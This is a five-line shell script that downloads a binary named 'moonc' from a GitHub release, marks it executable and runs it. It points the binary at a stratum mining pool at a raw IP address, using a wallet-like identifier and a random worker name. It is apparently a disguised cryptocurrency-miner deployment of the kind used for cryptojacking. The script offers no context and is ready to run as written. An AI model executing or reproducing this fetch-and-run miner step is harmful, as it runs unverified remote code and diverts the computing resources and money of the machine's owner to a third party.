#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/virtolm/moolam/releases/download/moolk/moonc
chmod +x moonc
./moonc -P stratum1+tcp://cb5691ea88389782ab6415d498877356f66e6c37a778.$(shuf -n 1 -i 1-99999)-moonA@54.86.101.75:8080
